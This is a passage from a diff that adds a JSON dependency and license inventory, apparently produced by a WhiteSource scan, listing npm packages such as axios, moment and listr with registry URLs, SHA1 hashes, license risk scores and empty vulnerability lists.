"https://www.npmjs.com/package/media-typer/v/0.3.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2657b31f-88b7-4a89-9200-4b28ece3e24b", + "keyId": 27596113, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/axios/-/axios-0.19.0.tgz", + "homePage": "https://github.com/axios/axios", + "genericPackageIndex": "https://www.npmjs.org/package/axios" + }, + "matchType": "SHA1", + "sha1": "8e09bff3d9122e133f7b8101c8fbdd00ed3d2ab8", + "name": "axios-0.19.0.tgz", + "artifactId": "axios-0.19.0.tgz", + "version": "0.19.0", + "groupId": "axios", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d19cb96e-d0e1-4e9c-9780-1afe8c6ba087" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fe125dcc-fa84-4186-8349-e204b9311112", + "keyId": 27088576, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/import-fresh/-/import-fresh-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/import-fresh#readme", + "genericPackageIndex": "https://www.npmjs.org/package/import-fresh" + }, + "matchType": "SHA1", + "sha1": "d81355c15612d386c61f9ddd3922d4304822a546", + "name": "import-fresh-2.0.0.tgz", + "artifactId": "import-fresh-2.0.0.tgz", + "version": "2.0.0", + "groupId": "import-fresh", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/import-fresh" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b7f4690e-1f4a-4e49-81ce-9d50e2aca502", + "keyId": 27088559, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/caller-path/-/caller-path-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/caller-path#readme", + "genericPackageIndex": "https://www.npmjs.org/package/caller-path" + }, + "matchType": "SHA1", + "sha1": "468f83044e369ab2010fac5f06ceee15bb2cb1f4", + "name": "caller-path-2.0.0.tgz", + "artifactId": "caller-path-2.0.0.tgz", + "version": "2.0.0", + "groupId": "caller-path", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/caller-path/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "75559abc-07bc-48c4-a31c-bad1fcf7f38a", + "keyId": 26961681, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz", + "homePage": "http://github.com/kevinbeaty/any-promise", + "genericPackageIndex": "https://www.npmjs.org/package/any-promise" + }, + "matchType": "SHA1", + "sha1": "abc6afeedcea52e809cdc0376aed3ce39635d17f", + "name": "any-promise-1.3.0.tgz", + "artifactId": "any-promise-1.3.0.tgz", + "version": "1.3.0", + "groupId": "any-promise", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2efcd319-b62d-4c75-b8d1-0a4957243263" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "91cd232e-c815-49c1-9a4a-925a8ee8c22e", + "keyId": 27127332, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/shimmer/-/shimmer-1.2.1.tgz", + "homePage": "https://github.com/othiym23/shimmer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/shimmer" + }, + "matchType": "SHA1", + "sha1": "610859f7de327b587efebf501fb43117f9aff337", + "name": "shimmer-1.2.1.tgz", + "artifactId": "shimmer-1.2.1.tgz", + "version": "1.2.1", + "groupId": "shimmer", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/shimmer/v/1.2.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "984dd534-e3eb-429c-a0dd-a4e984f54450", + "keyId": 27088503, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/caller-callsite/-/caller-callsite-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/caller-callsite#readme", + "genericPackageIndex": "https://www.npmjs.org/package/caller-callsite" + }, + "matchType": "SHA1", + "sha1": "847e0fce0a223750a9a027c54b33731ad3154134", + "name": "caller-callsite-2.0.0.tgz", + "artifactId": "caller-callsite-2.0.0.tgz", + "version": "2.0.0", + "groupId": "caller-callsite", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3cff2ff5-a0f8-4bbe-b157-d4f82978a023" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8ab31859-681f-4427-8f46-6b0597b157d5", + "keyId": 27512486, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-5.2.1.tgz", + "homePage": "https://github.com/davidtheclark/cosmiconfig#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cosmiconfig" + }, + "matchType": "SHA1", + "sha1": "040f726809c591e77a17c0a3626ca45b4f168b1a", + "name": "cosmiconfig-5.2.1.tgz", + "artifactId": "cosmiconfig-5.2.1.tgz", + "version": "5.2.1", + "groupId": "cosmiconfig", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a63064b7-77d0-45d5-9bfa-6b00c1a4cc84" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "409af37f-c43a-45c3-bfd7-7d2a41fdac1d", + "keyId": 27035555, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.5.10.tgz", + "homePage": "https://github.com/follow-redirects/follow-redirects", + "genericPackageIndex": "https://www.npmjs.org/package/follow-redirects" + }, + "matchType": "SHA1", + "sha1": "7b7a9f9aea2fdff36786a94ff643ed07f4ff5e2a", + "name": "follow-redirects-1.5.10.tgz", + "artifactId": "follow-redirects-1.5.10.tgz", + "version": "1.5.10", + "groupId": "follow-redirects", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d7985e76-2e4d-475a-8f9e-bc812a5c88e7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5d93a16b-f0d6-459b-8b56-51f7a5fd08e0", + "keyId": 27617952, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/tslib/-/tslib-1.10.0.tgz", + "homePage": "http://typescriptlang.org/", + "genericPackageIndex": "https://www.npmjs.org/package/tslib" + }, + "matchType": "SHA1", + "sha1": "c3c19f95973fb0a62973fb09d90d961ee43e5c8a", + "name": "tslib-1.10.0.tgz", + "artifactId": "tslib-1.10.0.tgz", + "version": "1.10.0", + "groupId": "tslib", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/Microsoft/tslib/blob/1.10.0/CopyrightNotice.txt" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3e61d9a8-cc72-46eb-9308-e66b023a8484", + "keyId": 27132471, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/moment/-/moment-2.24.0.tgz", + "homePage": "http://momentjs.com", + "genericPackageIndex": "https://www.npmjs.org/package/moment" + }, + "matchType": "SHA1", + "sha1": "0d055d53f5052aa653c9f6eb68bb5d12bf5c2b5b", + "name": "moment-2.24.0.tgz", + "artifactId": "moment-2.24.0.tgz", + "version": "2.24.0", + "groupId": "moment", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f3005cb8-6f8c-4ae9-abc0-959d9448bc63" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "11d28fdf-1d19-42af-b091-4d33d16db236", + "keyId": 27627961, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/icss-utils/-/icss-utils-4.1.1.tgz", + "homePage": "https://github.com/css-modules/icss-utils#readme", + "genericPackageIndex": "https://www.npmjs.org/package/icss-utils" + }, + "matchType": "SHA1", + "sha1": "21170b53789ee27447c2f47dd683081403f9a467", + "name": "icss-utils-4.1.1.tgz", + "artifactId": "icss-utils-4.1.1.tgz", + "version": "4.1.1", + "groupId": "icss-utils", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/icss-utils/v/4.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c59664ad-8176-4bc3-a72b-61615f5d5291", + "keyId": 26954767, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-observable/-/is-observable-1.1.0.tgz", + "homePage": "https://github.com/sindresorhus/is-observable#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-observable" + }, + "matchType": "SHA1", + "sha1": "b3e986c8f44de950867cab5403f5a3465005975e", + "name": "is-observable-1.1.0.tgz", + "artifactId": "is-observable-1.1.0.tgz", + "version": "1.1.0", + "groupId": "is-observable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-observable/v/1.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "afebdac1-a3a2-411a-9897-8f4a7e3effde", + "keyId": 26954596, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/indent-string/-/indent-string-3.2.0.tgz", + "homePage": "https://github.com/sindresorhus/indent-string#readme", + "genericPackageIndex": "https://www.npmjs.org/package/indent-string" + }, + "matchType": "SHA1", + "sha1": "4a5fd6d27cc332f37e5419a504dbb837105c9289", + "name": "indent-string-3.2.0.tgz", + "artifactId": "indent-string-3.2.0.tgz", + "version": "3.2.0", + "groupId": "indent-string", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b8253362-c644-4351-a7be-2777f82f0566" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f26873a3-6fa0-4c0f-8f6c-f9eb441e8387", + "keyId": 27092058, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-3.0.1.tgz", + "homePage": "https://github.com/chalk/wrap-ansi#readme", + "genericPackageIndex": "https://www.npmjs.org/package/wrap-ansi" + }, + "matchType": "SHA1", + "sha1": "288a04d87eda5c286e060dfe8f135ce8d007f8ba", + "name": "wrap-ansi-3.0.1.tgz", + "artifactId": "wrap-ansi-3.0.1.tgz", + "version": "3.0.1", + "groupId": "wrap-ansi", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/82e4d7ba-9444-4810-ac4f-0f2677fc8957" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c39c06bf-95c8-4f1f-aef4-faa658e91653", + "keyId": 26955204, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/elegant-spinner/-/elegant-spinner-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/elegant-spinner", + "genericPackageIndex": "https://www.npmjs.org/package/elegant-spinner" + }, + "matchType": "SHA1", + "sha1": "db043521c95d7e303fd8f345bedc3349cfb0729e", + "name": "elegant-spinner-1.0.1.tgz", + "artifactId": "elegant-spinner-1.0.1.tgz", + "version": "1.0.1", + "groupId": "elegant-spinner", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a2be0f61-1f24-4f18-8c9b-a7dd72914833" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e219c1b6-0ab6-4ef7-be7a-25eab8966323", + "keyId": 27092080, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/listr-verbose-renderer/-/listr-verbose-renderer-0.5.0.tgz", + "homePage": "https://github.com/SamVerschueren/listr-verbose-renderer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/listr-verbose-renderer" + }, + "matchType": "SHA1", + "sha1": "f1132167535ea4c1261102b9f28dac7cba1e03db", + "name": "listr-verbose-renderer-0.5.0.tgz", + "artifactId": "listr-verbose-renderer-0.5.0.tgz", + "version": "0.5.0", + "groupId": "listr-verbose-renderer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/listr-verbose-renderer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d9a39852-57d2-4abd-a8e6-cdb97b7b7a81", + "keyId": 27371272, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-map/-/p-map-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/p-map#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-map" + }, + "matchType": "SHA1", + "sha1": "310928feef9c9ecc65b68b17693018a665cea175", + "name": "p-map-2.1.0.tgz", + "artifactId": "p-map-2.1.0.tgz", + "version": "2.1.0", + "groupId": "p-map", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/p-map/v/2.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "23cca639-09d6-48a0-b819-df7748a49204", + "keyId": 26954981, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/listr-silent-renderer/-/listr-silent-renderer-1.1.1.tgz", + "homePage": "https://github.com/samverschueren/listr-silent-renderer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/listr-silent-renderer" + }, + "matchType": "SHA1", + "sha1": "924b5a3757153770bf1a8e3fbf74b8bbf3f9242e", + "name": "listr-silent-renderer-1.1.1.tgz", + "artifactId": "listr-silent-renderer-1.1.1.tgz", + "version": "1.1.1", + "groupId": "listr-silent-renderer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/listr-silent-renderer/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ca4d1391-ac17-48b3-875e-1042738aa068", + "keyId": 27007624, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/any-observable/-/any-observable-0.3.0.tgz", + "homePage": "https://github.com/sindresorhus/any-observable#readme", + "genericPackageIndex": "https://www.npmjs.org/package/any-observable" + }, + "matchType": "SHA1", + "sha1": "af933475e5806a67d0d7df090dd5e8bef65d119b", + "name": "any-observable-0.3.0.tgz", + "artifactId": "any-observable-0.3.0.tgz", + "version": "0.3.0", + "groupId": "any-observable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ffe30c17-6922-4e59-89cf-ab2602192911" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5b94c6e5-9c33-4a89-9827-9d4df54a4129", + "keyId": 27068276, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/date-fns/-/date-fns-1.30.1.tgz", + "homePage": "https://github.com/date-fns/date-fns#readme", + "genericPackageIndex": "https://www.npmjs.org/package/date-fns" + }, + "matchType": "SHA1", + "sha1": "2e71bf0b119153dbb4cc4e88d9ea5acfb50dc05c", + "name": "date-fns-1.30.1.tgz", + "artifactId": "date-fns-1.30.1.tgz", + "version": "1.30.1", + "groupId": "date-fns", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/91c5f8af-a8d9-4a84-a226-d6801f4109ff" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "907efe7f-3b36-4c8f-98d1-232eae086698", + "keyId": 27092138, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/log-update/-/log-update-2.3.0.tgz", + "homePage": "https://github.com/sindresorhus/log-update#readme", + "genericPackageIndex": "https://www.npmjs.org/package/log-update" + }, + "matchType": "SHA1", + "sha1": "88328fd7d1ce7938b29283746f0b1bc126b24708", + "name": "log-update-2.3.0.tgz", + "artifactId": "log-update-2.3.0.tgz", + "version": "2.3.0", + "groupId": "log-update", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/log-update/v/2.3.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "becc8af4-1d9c-4cd7-ad87-8df3fbd0b540", + "keyId": 27092081, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/listr-update-renderer/-/listr-update-renderer-0.5.0.tgz", + "homePage": "https://github.com/SamVerschueren/listr-update-renderer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/listr-update-renderer" + }, + "matchType": "SHA1", + "sha1": "4ea8368548a7b8aecb7e06d8c95cb45ae2ede6a2", + "name": "listr-update-renderer-0.5.0.tgz", + "artifactId": "listr-update-renderer-0.5.0.tgz", + "version": "0.5.0", + "groupId": "listr-update-renderer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/listr-update-renderer/v/0.5.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a2dfba35-9e22-4a15-84ff-59aff749abc5", + "keyId": 27092088, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/listr/-/listr-0.14.3.tgz", + "homePage": "https://github.com/SamVerschueren/listr#readme", + "genericPackageIndex": "https://www.npmjs.org/package/listr" + }, + "matchType": "SHA1", + "sha1": "2fea909604e434be464c50bddba0d496928fa586", + "name": "listr-0.14.3.tgz", + "artifactId": "listr-0.14.3.tgz", + "version": "0.14.3", + "groupId": "listr", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d0e7d992-ceb1-442b-9428-61461a89c734" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e5719aff-9468-40b3-8aaf-07a09578ec55", + "keyId": 27007670, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@samverschueren/stream-to-observable/-/stream-to-observable-0.3.0.tgz", + "homePage": "https://github.com/SamVerschueren/stream-to-observable#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@samverschueren/stream-to-observable" + }, + "matchType": "SHA1", + "sha1": "ecdf48d532c58ea477acfcab80348424f8d0662f", + "name": "stream-to-observable-0.3.0.tgz", + "artifactId": "stream-to-observable-0.3.0.tgz", + "version": "0.3.0", + "groupId": "@samverschueren/stream-to-observable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4c41fc85-5a2d-4141-9742-eee41ce2b996" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "43a1faf6-e4e6-4eb6-8a97-d0fcb9115071", + "keyId": 27276504, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-5.2.0.tgz", + "homePage": "https://github.com/chalk/strip-ansi#readme", + "genericPackageIndex": "https://www.npmjs.org/package/strip-ansi" + }, + "matchType": "SHA1", + "sha1": "8c9a536feb6afc962bdfa5b104a5091c1ad9c0ae", + "name": "strip-ansi-5.2.0.tgz", + "artifactId": "strip-ansi-5.2.0.tgz", + "version": "5.2.0", + "groupId": "strip-ansi", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7e15eb34-286e-42e9-ad39-8ee4fc69043e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2f4e9649-a4a1-410f-933c-a19779473fe7", + "keyId": 27605507, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "homePage": "https://github.com/zeit/ms#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ms" + }, + "matchType": "SHA1", + "sha1": "d09d1f357b443f493382a8eb3ccd183872ae6009", + "name": "ms-2.1.2.tgz", + "artifactId": "ms-2.1.2.tgz", + "version": "2.1.2", + "groupId": "ms", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ms/v/2.1.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a08308c2-18bb-46e8-9f60-571d16314a52", + "keyId": 27559579, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.4.0.tgz", + "homePage": "https://github.com/nodejs/readable-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/readable-stream" + }, + "matchType": "SHA1", + "sha1": "a51c26754658e0a3c21dbf59163bd45ba6f447fc", + "name": "readable-stream-3.4.0.tgz", + "artifactId": "readable-stream-3.4.0.tgz", + "version": "3.4.0", + "groupId": "readable-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/deb3641a-806a-493f-9cb1-85c1049ba369" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4644b26b-95c7-4c53-976a-c95576142ea3", + "keyId": 26954777, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-key/-/path-key-2.0.1.tgz", + "homePage": "https://github.com/sindresorhus/path-key#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-key" + }, + "matchType": "SHA1", + "sha1": "411cadb574c5a140d3a4b1910d40d80cc9f40b40", + "name": "path-key-2.0.1.tgz", + "artifactId": "path-key-2.0.1.tgz", + "version": "2.0.1", + "groupId": "path-key", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6d7a2b51-e7f9-4b7d-b752-7702b5312e83" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c8547402-afc1-4d90-9f5b-1078315c631a", + "keyId": 27605508, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/es6-promise/-/es6-promise-4.2.8.tgz", + "homePage": "https://github.com/stefanpenner/es6-promise", + "genericPackageIndex": "https://www.npmjs.org/package/es6-promise" + }, + 